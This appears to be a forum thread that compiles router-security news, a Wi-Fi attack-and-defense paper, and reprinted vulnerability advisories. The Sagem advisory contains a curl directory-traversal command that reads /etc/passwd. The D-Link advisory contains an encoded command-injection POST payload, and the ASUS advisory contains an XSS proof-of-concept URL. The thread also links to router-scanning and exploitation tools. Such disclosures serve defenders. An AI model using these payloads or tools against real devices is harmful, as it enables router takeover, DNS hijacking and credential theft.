Search the Community

https://ufile.io/c755f preview AV Test

Security researchers from Trend micro recently discovered a new JavaScript-based malware that infects your mobile devices and also attacks your home router by altering its DNS (Domain Name System) settings. This new threat was named as JS_JITON and was first noticed in end of December 2015, continuing to infect devices up until this day, hitting its peak in February 2016, with over 1,500 infections per day. Researchers say that the malware spreads it’s infection chain in a very simple way. Attackers place their code in some websites and wait for users to visit The malware’s infection chain is simple. According to Trend Micro researchers, attackers place malicious code on compromised websites and wait for users to visit these pages using mobile devices. Once this happens, the malware is downloaded to the user’s mobile device and executes, trying to connect to the local home network’s router IP using a series of admin and passwords combos hardcoded in the JS_JITON malware source code. The malware has over 1,400 credentials are included, and once the malware authenticates on the device, it will change the router’s DNS settings. Very little is known about what the intentions of this malware are, but taking into account that at one point it also included malicious code that executed from desktop computers, Trend Micro researchers believe this is a “work in progress,” with its creators still exploring their attack’s capabilities. The belief was made strong by the fact that attackers regularly update JS_JITON’s source code, changing small details here and there, fine tuning their attacks. Additionally, at one point, the JS_JITON source code also included a keylogging component. According to researchers JS_JITON could attack D-Link and TP-Link routers, but it also included a special exploit to take advantage of CVE-2014-2321, an older vulnerability in ZTE modems. Malwares like this could be a serious threat if not killed in the initial stage. Source

Salut.De cateva zile m-am uitat pe site-ul emag(tot primesc spam cu mega oferte etc.) si mi-am adus aminte ca nu mi-ar strica un router nou.Pe acesta il am acum Router wireless D-Link DIR-600 - eMAG.ro M-am uitat la aceste 2 modele, fiind cele mai cumparate Router Wireless-N Tenda F300, 300Mbps - eMAG.ro Router Wireless-N 300Mbps Asus RT-N12-D1 - eMAG.ro Care e diferenta dintre ele?Inafara de pret.Am vazut niste prostii pe acolo, gen ca pot creea mai multe retele pt diferiti useri, dar nu prea am nevoie de asa ceva, ca pe el stau eu si familia... Pe care mi-l recomandati?Sau...mai bine spus, se merita sa cumpar unul din ele, sau sa mai strang bani si sa iau unul mai bun?Precizez ca nu o duc f bine cu viteza de net, si uneori am si cate 6-7 kkturi conectate la router.

Salut, cine ma poate ajuta cu un tutorial ca sa pot instala OpenWRT pe Router Pirelli Alice Gate VoIP 2 Plus Wi-Fi. Doresc sa transform un port LAN in WAN si sa il folosesc pe RDS. Am gasit pe un site in italiana dar nu prea inteleg... Multumesc anticipat.

While the access points in organizations are usually under the protection of organization-wide security policies, home routers are less likely to be appropriately configured by their owners in absence of such central control. This provides a window of opportunity to neighboring Wi-Fi hackers. We talk about hacking a neighbor’s Wi-Fi since proximity to the access point is a must for wireless hacking—which is not an issue for a neighbor with an external antenna. With abundance of automated Wi-Fi hacking tools such as ‘Wifite’, it no longer takes a skilled attacker to breach Wi-Fi security. Chances are high that one of your tech-savvy neighbors would eventually exploit a poorly configured access point. The purpose may or may not be malicious; sometimes it may simply be out of curiosity. However, it is best to be aware of and secure your Wi-Fi against attacks from such parties. Tools Used: Aircrack-ng Suite Wireshark Reaver Bully WiFiPhisher Nessus Vulnerability Scanner Attacks Against Access Point Password The choices of attack for a neighboring Wi-Fi hacker vary with different configurations of Wi-Fi access points. Specific Wi-Fi security standards are associated with particular security weaknesses that the attacker would target. Open Hotspots Although rare, open Wi-Fi access points are still extant in certain homes. When open access points are deployed in homes, it could be out of ‘generosity’ towards neighbors or sheer insouciance towards security, or both. It is observed that home users with unlimited bandwidth and data are more likely to leave their access point unsecured, unaware of the security implications. Attack: Open Wi-Fi networks do not encrypt data packets over wireless channels. This means that anyone with a packet capture utility can read unencrypted HTTP, email, and FTP traffic. In this case, we captured the traffic pertaining to an open Wi-Fi on channel 1 using ‘Airodump-ng’, and analyzed the captured file in Wireshark, which revealed that a user on the network was logging into his (demo) bank account [Figure 1]. Figure 1 While it is highly unlikely today that a banking website would lack an HTTPS link, this is meant to demonstrate the dangers of using unencrypted Wi-Fi along with unencrypted protocols such as HTTP, FTP, SMTP, etc. Defense: Never leave the access point ‘open’ or unsecured. Access the control panel of the wireless router and configure it to use a complex WPA2 key (explained later in this paper). If you insist on using an open access point, consider using ‘HTTPS Everywhere‘ while browsing. WEP IV Collisions WEP is an outdated security standard vulnerable to statistical attacks due to IV collisions. It offers a false sense of security, and in the wake of WPA2, it is hard to think of a reason why one would want to use it. Attack: Since WEP cracking has been covered on myriad blogs and websites already, we will refrain from going into details of attacks against it. For the intricacies of how such attacks are performed, you may visit this page. Defense: Since the use of WEP is now deprecated due to serious security flaws, you should use WPA2 (AES) instead. WPS Based Attacks WPS PIN is an 8 digit number pertaining to the wireless router. It was meant to liberate users from having to remember complex WPA passwords. The idea was that since WPA is susceptible to dictionary attacks, the user would set a complex WPA passphrase and deploy WPS in order to avoid having to remember the passphrase. After supplying the correct WPS PIN to the router, it would hand over the configuration details to the client—which includes the WPA password. Brute forcing the WPS PIN WPS was implemented incorrectly: Firstly, the last digit of the PIN was a checksum which means the effective size of a WPS PIN is only 7 digits. Moreover, the registrar (router) checks the PIN in 2 parts. This means the first part of 4 digits would have 10,000 possible combinations, and the second part of 3 digits would have 1,000 possible combinations. Hence, the attacker would require only 11,000 attempts, in the worst case, to brute force the PIN—which is very feasible. Here, during an experiment, we were able to crack the WPS PIN in under 6 hours using the popular tool ‘reaver’ [Figure 2]. Figure 2 Defense: Make sure you have the latest firmware installed and that your router has a WPS lockout policy (AP rate limiting) after a certain number of unsuccessful attempts. In absence of such lockout policy, turn off WPS in your router. Known WPS PIN The WPS PIN attack becomes incredibly effective and short if the attacker somehow has knowledge of a neighbor’s WPS PIN. Attack: How does the hacker (in this case a neighbor) know the WPS PIN? The PIN is usually written on the bottom of the wireless router. The (evil) neighbor could quickly glance at it during a social visit. Additionally, access points may be left ‘open’ for a certain duration while the user is implementing some router configuration changes or performing a factory reset. This offers a window of opportunity to the attacker to quickly connect to the router, access the control panel (using default credentials), and take note of the WPS PIN [Figure 3]. Figure 3 Once the hacker gains knowledge of the PIN, it could be used to uncover a complex WPA passphrase in seconds. Defense: Scrub off the WPS PIN on the bottom of the wireless router, and avoid leaving your access point ‘open’ at any time. Furthermore, most updated routers will allow the owner to change the WPS PIN from the control panel [Figure 4]. Generate a new WPS PIN periodically. Figure 4 Dictionary Attacks on WPA Handshakes As long as strong, complex WPA passphrases are used to protect the access points, dictionary attacks on WPA handshakes are not really a concern. However, every once in a while a user will configure a dictionary word as the WPA password for the sake of simplicity. This leads to successful recovery of passwords from the WPA 4-way handshakes using dictionary attacks. Attack: The attacker seeks to capture the WPA 4-way handshake between a legitimate client and the access point. A dictionary attack is used to recover the plaintext passphrase from this WPA handshake. For the intricacies of this attack, you can visit this page. Defense: Configure complex passphrases that are a combination of special characters, numbers, letters, etc. Never use personal information such as your phone number as the WPA passphrase, as it might be guessed. Wi-Fi Phishing When all else fails, social engineering could always be relied upon to exploit what is often the weakest link in the chain of security—the human element. Phishing is a type of social engineering attack where the user of the Wi-Fi access point could be tricked into revealing the password. Attack: Traditionally, such phishing attacks are carried out over emails; however, in this case even a naïve user would get suspicious if the attacker asks for a WPA password over email. Hence, the best approach is to launch an evil twin attack, make the user join the fake access point, and ask for the password. WiFiPhisher, a python tool, implements this approach. First, the tool prepares the attacker’s machine for the attack. This involves setting up the HTTP and HTTPS servers, detecting the wireless interfaces (wlan0 and wlan1), putting one of these interfaces in monitor mode, and managing DHCP services for IP address allotment [Figure 5]. Figure 5 The tool then detects the Wi-Fi access points in the vicinity and lists them for the attacker [Figure 6]. The attacker then specifies the access point to attack. Figure 6 After the attacker chooses the access point, the tool clones the ESSID and attempts to jam the authentic access point. This is important since the attacker wants the users to get de-authenticated from the legitimate network and connect to the evil twin. If the users are not knocked off their authentic access point, or if the attacker’s evil twin access point is too far away for the users to get a strong signal from it, then the attack does not work, since no users will connect to the evil twin. This evil twin access point is now waiting for clients to connect. When a client connects, the attacker is notified that an IP address is allocated to a client. In this case, we notice that an Android device has connected to the evil twin [Figure 7]. Figure 7 Now, it is just a matter of time before this client attempts to access a webpage online. When the client requests a webpage, our HTTP or HTTPS server would serve the phishing page instead. For instance, here the client, the Android device, requested to connect to Google and was served the phishing page instead [Figure 8]. Figure 8 The attacker is notified of the client’s request for the web page and knows now that the client has been served the phishing page [Figure 9]. Figure 9 Moment of truth: either the user gets suspicious and closes the connection, or falls for the con and provides the WPA password as requested [Figure 8]. The user is redirected to an “upgrade-in-progress” page after he submits the WPA password [Figure 10]. Figure 10 Meanwhile, the password is revealed to the attacker over the console [Figure 11]. Figure 11\ The user may end up revealing the password due to the following reasons: The user surmises that he is connected to his own legitimate access point. The phishing page is intentionally cloaked to appear as an authentic router page. User has a curiosity towards the open access point with the same ESSID. Defense: Always be wary of any page asking for a password. Avoid giving out the WPA password over shady pages. Aftermath: The Hacker is in Once the attacker has obtained the password and is connected to the access point, he would attempt to explore further. The first point of interest is the router’s control panel. Default credentials: A surprising number of home users do not change the default credentials to their router’s management panel. Router default credentials can be obtained on the Internet, and subsequent access to this management console grants the hacker further privileges on the network. Digging PIN and passwords: Once inside the Wi-Fi management panel, the hacker would note down the WPS PIN and any hidden password for future use. “Hidden” passwords behind asterisks are easy to uncover. For instance, we uncover the ‘admin’ and ‘user’ passwords germane to a router using ‘Inspect element’ in Chrome [Figure 12]. Figure 12 Exploiting clients: Since the attacker is now a part of the local network, he can initiate local scans to glean details of clients, services, ports etc. This allows the attacker to target vulnerabilities pertaining to clients connected to the network [Figure 13]. Figure 13 DNS Manipulation: If the attacker has secured access to the router’s control panel, he can modify the DNS configuration which has severe implications on security. For example, the attacker could plant a fake DNS entry to redirect clients using an online banking service to a rogue server serving phishing pages. Maintaining Access: A persistent neighboring hacker requiring prolonged access to the Wi-Fi access point would want to ensure continued access even after the current password or security protocol is modified later by the owner. Accordingly, the hacker would access the router control panel and take note of the WPS PIN [Figure 4]. More advanced attackers would try to plant a backdoor in the router firmware, such as a master password, that would allow them to access the Wi-Fi at will in the future. However, this involves flashing custom firmware, such as DD-WRT, to the router. DD-WRT provides open source router firmware for numerous wireless router models. The attacker would download the appropriate DD-WRT firmware, modify the source code to include a master password or backdoor, and flash this firmware to the router using the router control panel DDW1 [Figure 14]. Figure 14 Conclusion The purpose of this paper is not to condone hacking your neighbors’ Wi-Fi, rather to apprise owners of common security weaknesses in Wi-Fi configurations and suggest relevant mitigation. “Since I have unlimited data and bandwidth, I do not mind if an unknown person is using my Wi-Fi.” While this generosity is worthy of some appreciation, bandwidth and data usage are not the only concerns when your Wi-Fi is accessed by an unauthorized party. Consider the case where a neighbor attempted to indict the owners after cracking their WEP key and accessing child pornography websites. Since it is your network, the ISP and authorities turn to you while investigating illicit activities. Router manufacturers provide GUI control panels that make it easy for owners to configure their access points. It is best to utilize these interfaces for secure configuration of access points that are capable of thwarting attacks from neighbors. References [1] DD-WRT. DD-WRT. [Online]. Development - DD-WRT Wiki [2] Nikita Borisov, Ian Goldberg, and David Wagner. isaac.cs.berkeley.edu. [Online]. (In)Security of the WEP algorithm [3] Sean Gallagher. (2014, January) ArsTechnica. [Online]. Backdoor in wireless DSL routers lets attacker reset router, get admin | Ars Technica Source

Router Scan is able to find and identify a variety of devices from a variety of known routers / routers, and most importantly - to pull out of them useful information, in particular the characteristics of the wireless network: a way to protect the access point (encryption), access point name (SSID) and key access point (passphrase). Also receives information about the WAN connection (useful when scanning the local network) and outputs the make and model of the router. Getting information occurs in two possible ways: the program will try to pick up a couple of login / password to the router from the list of standard passwords, resulting gain access. Or will be used non-destructive vulnerability (or bugs) for the router model, allowing to obtain the necessary information and / or to bypass the authorization process. TinyUpload.com - best file hosting solution, with no limits, totaly free pass: Stas'M Corp. Virus total https://www.virustotal.com/en/file/a5f42a031933c0db2198aa24adb0799290aa0bbba9a9fe556fe7efb60d616602/analysis/

# Title : Sagem F@st 3304-V2 Directory Traversal Vulnerability # Vendor : http://www.sagemcom.com # Severity : High # Tested Router : Sagem F@st 3304-V2 (3304, other versions may also be affected) # Date : 2015-03-01 # Author : Loudiyi Mohamed # Contact : Loudiyi.2010@gmail.com # Blog : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603 # Vulnerability description: Sagem Fast is an ADSL Router using a web management interface in order to change configuration settings. The router is Sagem Fast is an ADSL Router using a web management interface in order to change configuration settings. The web server of the router is vulnerable to directory traversal which allows reading files by sending encoded '../' requests. The vulnerability may be tested with the following command-line: curl -v4 http://192.168.1.1//../../../../../../../../../../etc/passwd Or directly from navigateur: http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd http://192.168.1.1/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fproc%2fnet%2farp Source

Feature "It is far more common to find routers with critical flaws than without" - Craig Young "It's sad that end-user education about strong passwords, password safes, and phishing can be undone by something as innocuous as the blinking box in the corner of your room. - Peter Adkins Introduction Home and small business router security is terrible. Exploits emerge with depressing regularity, exposing millions of users to criminal activities. Many of the holes are so simple as to be embarrassing. Hard-coded credentials are so common in small home and office routers, comparatively to other tech kit, that only those with tin-foil hats bother to suggest the flaws are deliberate. Hacker gang Lizard Squad crystallised the dangers – and opportunities – presented by router vulnerabilities when over the Christmas break they crafted a slick paid denial of service stresser service that operated on hacked boxes. Customers were found paying to flood targets of choice with gigabits of bandwidth stolen from what the black hats claimed were a fleet of half a million vulnerable and subsequently hacked routers. A year earlier, security boffins at Team Cymru warned that an unknown ganghad popped 300,000 routers in a week, altering the DNS settings to point to malicious web entities. Those routers were hacked through a self-propagating worm (PDF) that researchers had already warned about, but not yet seen. It used a mix of brute force password guessing of web admin consoles, cross-site request forgery, and known un-patched vulnerabilities. Arguably the most infamous hack in recent months was Check Point's so-called Misfortune Cookie discovered in December 2014. This vulnerability was thought to impact a staggering 12 million routers across 200 models from big names such as Linksys, D-Link, TP-Link, ZTE, and Huawei. Affected routers could be hijacked with a crafted cookie that allows attackers to meddle with just about everything on the units, from password theft, to alterations to DNS, and infection of connected devices. In October Rapid7 had chipped in with its own research, warning that Network Address Translation Port Mapping Protocol configurations in 1.2 million routers was sufficiently borked that remote attackers could spy on internal traffic. Security is 'abysmal' "Router security remains abysmal, especially among the cheapest brands,” says John Matherly, founder of the popular Shodan search engine which crawls for internet-connected devices. “Backdoors, no automated patching and default usernames and passwords are just a few of the problems that many SOHO routers continue to face.” Matherly last month dug up an estimated 250,000 routers used in Spain that were using the same SSH keys, placing those configured a for remote access at heighten risk. He also points to research published two days later by Entrust Solutions hacker Nabin Kc, who found 200,000 home routers contained a firmware backdoor, a flaw replicated across 10 different vendors who seemed to be re-branding a vanilla router. Matherly says badge-engineering seems a common practise for vendors that compete on price over form or function. “It seems that the rate of security problems discovered with routers is only limited by the number of security experts that take the time to analyse the devices,” he says. Source

Amnesia strikes as hacker discloses remote code exec flaws Domestic router Daddy D-Link is patching dangerous remote access flaws in several models of its networking gear. The patches follow a round of zero-day disclosures by Canadian researcher Peter Adkins early this week, after D-Link allegedly cut communication while he quietly disclosed the flaws. The most severe flaw allowed attackers to hijack the devices including changing DNS settings by creating malicious sites which exploit cross-site request forgeries. D-Link issued an advisory in which it warns DIR models 626L; 636L; 808L; 810L; 820L; 826L; 830, and 836L are open to remote code execution. D-Link says attackers can upload and run files without authentication from the LAN-side of the device or over the internet if the "external connections" box was taken off default and ticked. "A second vulnerability reportedly relates to the device’s ping utility that might permit command injection without authentication," the company says of Adkin's work. "A third vulnerability reportedly may exploit certain chipset utilities in firmware to potentially permit a malicious user an attack disclosing information about the devices configuration." Adkins told El Reg ,many of the security failings in home routers could be put down to expansive feature sets. "The platforms the devices are build upon may be solid - such as OpenWRT - but then additional services are 'bolted in' to provide value-add, and that security seems to go straight out of the window," Adkin says. Other routers may be affected due to the location of ncc and ncc2 binaries Fellow router hackers Stefan Viehböck and Jeremy Richards found further flaws in five TRENDnet offerings since patched, plus another D-Link mess. Adkins reports contact between D-Link and himself ceased around February 23 when D-Link, after confirming receipt of the vulnerability reports on 11 January, said they had no knowledge of the holes and directed him to the company security reporting guide. The company recommends users run encrypted wireless to prevent the low chance that passing hackers would break into the networks. Only the DIR-820L was patched. Source

############################################################################# # # SWISSCOM CSIRT SECURITY ADVISORY - http://www.swisscom.com/security # ############################################################################# # # CVE ID: CVE-2015-1187 # Product: D-Link DIR636L # Vendor: D-Link # Subject: Remote Command Injection - Incorrect Authentication # Effect: Remotely exploitable # Author: Tiago Caetano Henriques, tiago.caetanohenriques AT swisscom.com # Stephan Rickauer, Swisscom CSIRT (csirt AT wisscom.com) # Date: March 2nd 2015 # ############################################################################# Introduction ------------ Tiago Caetano Henriques discovered a security flaw in D-link DIR-636L router that enables an attacker on the same network to execute arbitrary commands without being authenticated. Vulnerable ---------- D-Link DIR-636L and possibly other versions as seen on [1]. Patches ------- None existant at the moment. Description ----------- The D-Link DIR636L (possibly others) incorrectly filters input on the 'ping' tool which allows to inject arbitrary commands into the router. Secondly, authentication is not being performed correctly. This enables a remote attacker to gain full control of the router, for example to attack other networks in a DDoS style attack, or even expose computers behind these devices to the internet as you are able to change firewall/nat rules on this router. Attack vector ------------- A URL encoded POST request with the values in front of ping_addr= such as the following, will go through and will execute the command in front of &. POST /ping.ccp HTTP/1.1 Host: 192.168.0.1 ... X-Requested-With: XMLHttpRequest Referer: http://192.168.0.1/tools_vct.asp Content-Length: 64 Cookie: ccp_act=ping_v4&ping_addr=%31%39%32%2e%31%36%38%2e%30%2e%31%30%37%20%26%20%2f %62%69%6e%2f%70%69%6e%67%20%39%34%2e%32%33%2e%37%38%2e%32%33%31 Milestones ---------- Nov 30th 2014 Vulnerability discovered by Tiago Caetano Henriques Dec 18th 2014 Vulnerability reported to Swisscom CSIRT Jan 7th 2015 CVE ID requested at MITRE Jan 18th 2015 CVE ID 2015-1187 assigned by MITRE Feb 2th 2015 Vendor contact established and provided with technical details Feb 16th 2015 Vendor acknowledged issue and communicates time line for patches Feb 26th 2015 Full Disclosure by Peter Adkins Mar 2nd 2015 Forced Public Release of this Advisory due to the previous Full Disclosure at [1] References ---------- [1] https://github.com/darkarnium/secpub/tree/master/Multivendor/ncc2 Source/url]

Pharming attacks are generally network-based intrusions where the ultimate goal is to redirect a victim’s web traffic to a hacker-controlled webserver, generally through a malicious modification of DNS settings. Some of these attacks, however, are starting to move to the web and have their beginnings with a spam or phishing email. Researchers at Kaspersky Lab have been watching this trend for some time, reporting in September on a particular campaign in Brazil targeting home routers using a combination of drive-by downloads and social engineering to steal banking and other credentials to sensitive web-based services. Messaging security company Proofpoint yesterday reported on the latest iteration of this attack, also based in Brazil. The campaign was carried out during a five-week period starting in December when Proofpoint spotted phishing messages, fewer than 100, sent to customers of one of the country’s largest telecommunications companies, Oi, also known recently as Telemar Norte Leste S/A. Users were sent a phishing email warning them of a past-due account and providing them a link supposedly to a portal where they could resolve the issue. Instead, the websites host code that carries out a cross-site request forgery attack against vulnerabilities in home UTStarcom and TP-Link routers distributed by the telco. The pages contain iframes with JavaScript exploiting the CSRF vulnerabilities if present on the routers. They also try to brute force the admin page for the router using known default username-password combinations. Once the attackers have access to the router, they’re able to change the primary DNS setting to the attacker-controlled site, and the secondary setting to Google’s public DNS. “Setting a functioning DNS server as the secondary will allow DNS requests from clients in this network to resolve even if the malicious DNS becomes unavailable, reducing the chance that the user will notice an issue and contact their telecom’s Customer Support line for assistance, which could lead to the discovery and eventual removal of the compromise,” Proofpoint said in its advisory. Via this method, the attacker bypasses the need to own public DNS servers in order to redirect traffic, and have an easier path to man-in-the-middle attacks, which they can use to sniff traffic, in this case for banking credentials, or email. “It’s elegantly vicious,” said Kevin Epstein, vice president, advanced security and governance at Proofpoint. “It’s an attack that, based on the way it’s constructed, is almost invisible. There are no traces on the laptop other than the [phishing] email and unless you’re a security pro logged into the router and know what the DNS is supposed to be, you can look at it and not realize it’s been compromised.” The best defense is to change the router password, especially if it’s still the default provided by the ISP. The potential for trouble extends well beyond this small campaign in Brazil; any router secured with default credentials is susceptible to this attack and a plethora of others. Kaspersky researcher Fabio Assolini, who lives in Brazil, said he’s seeing an average of four new such attacks daily. “It’s not a limited pharming campaign; it’s massive,” he said. Router hacks have been a growing nuisance in the last 12 to 18 months, with more white hat researchers looking into the breadth and severity of the issue. Some cases, such as the Misfortune Cookie vulnerability in a popular embedded webserver called RomPager, have put 12 million devices, including home routers, at risk of attack. Last summer during DEF CON, a hacking contest called SOHOpelessly Broken focusing on router vulnerabilities, yielded 15 zero-day vulnerabilities that were reported to vendors and patched. While in this case, the attackers targeted banking credentials for online accounts, Proofpoint’s Epstein said he can see that scope expanding. “As far as motive, the [proof of concept exploits] we saw seem financially motivated, which is typical of most cybercrime, but the technique is generally applicable,” he said. “If you wanted to harvest a bunch of traffic for a DDOS attack or get into a company, this is a way to do it and gain complete man-in-the-middle control over the user.” Source

Router Hunter is a php script that scans for and exploits DNS change vulnerabilities in Shuttle Tech ADSL Modem-Router 915 WM and D-Link DSL-2740R routers and also exploits the credential disclosure vulnerability in LG DVR LE6016D devices. Download

##################################### Title:- Reflected XSS vulnarbility in Asus RT-N10 Plus router Author: Kaustubh G. Padwad Product: ASUS Router RT-N10 Plus Firmware: 2.1.1.1.70 Severity: Medium Auth: Requierd # Description: Vulnerable Parameter: flag= # Vulnerability Class: Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XSS)) # About Vulnerability: Asus Router RT-N10 Plus with firmware 2.1.1.70 is vulnarable for crosss site scripting attack,this may cause a huge network compemise. #Technical Details: The value of the flag request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload initial78846%27%3balert("Hacked_BY_S3curity_B3ast")%2f%2f372137b5d was submitted in the flag parameter. This input was echoed unmodified in the application's response. #Steps to Reproduce: (POC): After setting up router Enter this URL 1.http://ip-of-router/result_of_get_changed_status.asp?current_page=&sid_list=LANGUAGE%3B&action_mode=+App ly+&preferred_lang=&flag=initial78846%27%3balert(1337)%2f%2f372137b5d 2. this will ask for creadintial once creatintial enterd it will be successfull XSS # Disclosure: 8-jan-2015 Repoerted to ASUS 9-jan-2015 Asus confirm that they reported to concern department 15-jan-2015 Ask for update from asus asus says reported to HQ 28-jan-2015 Ask asus about reporting security foucus No reply from ASUS 29-jan-2015 security focus bugtraq #credits: Kaustubh Padwad Information Security Researcher kingkaustubh@me.com https://twitter.com/s3curityb3ast http://breakthesec.com https://www.linkedin.com/in/kaustubhpadwad Source

In a blog post, Eloi said that During Christmas Holidays he forgot the admin interface password of his Linksys WAG200G router and in an effort to gain access back of its administration panel, he first scanned the Router and found a suspicious open TCP port i.e. 32764. To do further research on this port service, he downloaded a copy Linksys firmware and reverse-engineered it. He found was a secret backdoor interface that allowed him to send commands to the router from a command-line shell without being authenticated as the administrator. Then he tried to Brute-force the login available at that port, but doing so flips the router's configuration back to factory settings with default router administration username and password. 'The backdoor requires that the attacker be on the local network, so this isn’t something that could be used to remotely attack DSL users. However, it could be used to commandeer a wireless access point and allow an attacker to get unfettered access to local network resources.' He described the complete details of this Serious vulnerability in above slides. After his post, other hackers around the world did further research, that shows that these devices are made by Sercomm, meaning that Cisco, Watchguard, Belkin and various others may be affected as well. Source: Hacking Wireless DSL routers via Administrative password Reset Vulnerability The Python based exploit script can be downloaded from here: https://github.com/elvanderb/TCP-32764 The Complete List of vulnerable devices can be found here: https://github.com/elvanderb/TCP-32764/blob/master/README.md